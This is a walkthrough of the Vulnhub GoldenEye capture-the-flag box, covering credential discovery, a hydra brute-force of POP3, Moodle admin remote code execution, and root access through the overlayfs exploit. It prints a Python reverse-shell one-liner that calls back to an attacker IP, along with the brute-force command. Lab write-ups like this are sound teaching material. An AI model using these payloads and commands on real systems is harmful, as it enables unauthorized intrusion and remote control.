GoldenEye: 1 | Vulnhub Walkthrough
GoldenEye is a secret service themed challenge developed by creosote and hosted on Vulnhub. GoldenEye is a CTF style box, rather than a realistic pentest scenario. This box requires quite a bit ‘out of the box’ thinking, to reach the root.
Level: Intermediate
Netdiscover is an alternative to arp-scan which can be used to discover the IP address of the target.
Breaking the first few pieces of the puzzle
There were two pop3 ports and one smtp port apart from the web application running on port 80. The main application suggested to navigate to /sev-home/. However the application prompted for username and password when browsing to /sev-home/ and I had no idea on the credentials yet.
Time to dig deeper! On the HTML source of the page, I figured out the JavaScript file responsible for the nice home page animation. On the terminal.js, I found the first hint. A hard-coded password for boris encoded in HTML encoding, which is very trivial to decode. I obtained credentials to access the application.
username: boris
Password: InvincibleHack3r
Access to the application was of no use. I tried using the same credentials to access pop3 service and checked if agent boris had any interesting emails. However the obtained password was not meant for pop3 access. Honestly I was stuck here for good some time.
Having no other leads, I did a quick brute-force attack on the pop3 service with username as boris. Hydra was able to crack the password with the fasttrack.txt wordlist present in Kali.
hydra -L username -P /usr/share/wordlists/fasttrack.txt -t20 192.168.56.103 -s55007 -I pop3
The contents of the email communications were not directly exploitable, but I was able to figure out the user names of other agents working on the mission. This could be used to mount the same attack on other agents as well. I got lucky with natalya.
username: xenia
password: RCP90rulez!That was great! I got credentials for agent xenia. There were few details in the email that was worth noting. We need to configure the DNS name of the box as severnaya-station.com in our /etc/hosts file to be able to access the training system.
Now I could browse to severnaya-station.com/gnocertdir to access the training portal as xenia. The learning portal is hosted using Moodle, a open source learning platform.
I couldn’t get access to any course materials or attachments from the portal. But there was a message from Dr Doak who is the supervisor for the GoldenEye project. He says in the message that his email user id is doak. I tried another attack using hydra on the pop3 service.
That was the dumbest password a secret service agent could use! Nevertheless, I got access to the email communications using the newly discovered credentials. From the email communications, I discovered the credentials to access moodle as agent Doak.
username: dr_doak
password: 4England!
I found an interesting attachment on Dr Doak’s account which suggested that admin credentials for the applications can be obtained from /dir007key/for-007.jpg. Using steganography, secret messages can be embedded into images.
I ran exiftool on the image, to discover a base64 encoded message on the image metadata. Using the obtained credentials, admin access can be obtained to moodle.
username: admin
password: xWinter1995x!
Moodle Admin User Remote Code Execution
On obtaining admin access to moodle, it is fairly easy to obtain a reverse shell. On moodle settings, there is a setting for configuring system paths. Aspell is spell checker which can be installed on Linux and can be used in moodle for spell check actions. Whenever the spellcheck action is initiated, moodle will invoke the Aspell binary. We can edit the path of Aspell to obtain a reverse shell. Below is the payload I used.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.101",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Once the path is properly set, any blog post or page can be created. On the editor the spellcheck function can be invoked to obtain reverse shell connection.
Path to root
I started with enumerating OS version of the box. It was an Ubuntu 14.04.1 box. On Google research I found that the machine was vulnerable to overlayfs (EDB-37292)exploit. I compiled it on my machine and transferred it to the target box. On running the exploit I got an error - sh: 1: gcc: not found.
There was no gcc on the target box. If we check the exploit-db 37292 exploit code, on line number 143 you can see that gcc is being invoked by the exploit. Well that was tricky.
lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");I enumerated the box using linuxprivchecker.py to enumerate installed development tools. There was no gcc in the box, but there was cc instead. cc is the name of the original UNIX c compiler command. I am no expert in commenting about the exact difference between cc and gcc. I tried to change gcc to cc in the exploit source code and compiled it. The resultant binary rooted the box for me.
Root flag can be read from root folder. 568628e0d993b1973adc718237da6e93
GoldenEye had a nice plot and it was a thrilling experience overall. It took a bit longer for me to break this box compared to boxes of similar difficulty. I recommend this box to folks interested in puzzles.
